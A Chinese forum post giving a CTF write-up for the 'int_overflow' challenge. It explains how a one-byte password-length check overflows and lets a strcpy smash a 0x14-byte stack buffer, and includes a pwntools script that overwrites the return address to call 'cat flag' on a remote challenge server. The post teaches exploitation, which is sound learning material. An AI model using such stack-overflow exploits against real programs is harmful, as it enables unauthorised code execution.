本帖最后由 yaoyao7 于 2019-10-3 11:17 编辑
int_overflow题解
首先,进行程序基本信息检查:
没有canary,没有PIE。程序执行是先选择一个子流程,然后输入username,再输入passwd。这里要考虑程序是否会对输入的字符串的长度进行限制,先留心一下。
IDA查看一下源码:
- 首先看一下strings:
有收获,存在几个危险函数,而且存在"cat flag",可以考虑直接调用。- 进main函数看一下:
没有发现什么大问题,直接进login。
需要留心一下,username和passwd都做了最大长度限制。但是passwd的长度未免太长了吧。。。太可疑。- 进入check_passwd查看对passwd的处理:
到这里就很明显了,函数首先设定了v3变量,但是大小只有一个字节,共8bit。前面对passwd进行长度限制时,最大长度为0x199,这很明显一个字节存储不下。那么会发生什么呢?整数溢出。(后续会给出整数溢出的相关知识介绍)
输入的passwd的长度给到v3,进行判断,因为存在整数溢出,所以这里输入的字符的个数不管是3~8还是259~264都是可以通过验证的。再往下,使用strcpy将passwd拷贝进stack中,stack中给出的保存passwd的大小为0x14 :
如果输入的passwd的字符个数超过了0x14,那么就会覆盖到stack中的内容。
- 覆盖数据计算:
思路已经确定,利用整数溢出漏洞来输入大量的passwd字符造成栈溢出。具体长度只要在259~264之间即可。此处选择262。看一下汇编确认具体的填充数据结构:
从汇编代码中可以看到,想要覆盖到返回地址,先使用0x14 个数据覆盖stack拷贝的passed的内存区域,然后使用4字节数据覆盖ebp,再使用"cat flag"的地址覆盖返回地址,最后接上262剩余的数据即可。
所以payload的构成为:
payload = "A"*0x14 +"AAAA"+ P32(cat_flag_addr) + "A"*234(262-0x14-4-4)
EXP:
[Python] 纯文本查看 复制代码 from pwn import *
sh=remote('111.198.29.45',44241)
sh.sendlineafter("choice:","1")
sh.sendlineafter("username:\n","xctf")
cat_flag_addr = 0x08048694
payload = "A" * 0x14 + "AAAA" + p32(cat_flag_addr) + "A" * 234
sh.sendlineafter("passwd:\n",payload)
print sh.recvall()
执行结果
整数溢出的相关知识
整数分为有符号和无符号两种类型,有符号数以最高位作为其符号位,即正整数 最高位为0,负数为1,无符号数取值范围为非负数,常见各类型占用字节数如下:
对于unsigned short int类型的数据,var1 = 1,var2 = 65537,用计算器看一下:
65537会发生高位截断,截断之后最高位的1被舍弃,这样数据就变成了1。使用代码验证一下:
[C] 纯文本查看 复制代码 #include <stdio.h>
int main(){
unsigned short int a = 1;
unsigned short int b = 65537;
if(a == b){
printf("Int overflow sucssesfully!\n");
}
return 0;
}
编译运行之后如下:
也就是说,对于一个2字节的unsigned short int 型变量,它的有效数据长度为2个字节,当它的数据长度超过2个字节时,就发生溢出,溢出的部分则直接忽略。使用相关变量时,使用的数据仅为最后2个字节,因此就会出现65537等于1的情况,其他类型变量和数值与之类似,更为详细的说明可以参考ctf-all-in-one。
| 
[复制链接]
发表于 2019-10-2 19:20
|
发表于 2019-10-3 11:18
感谢指正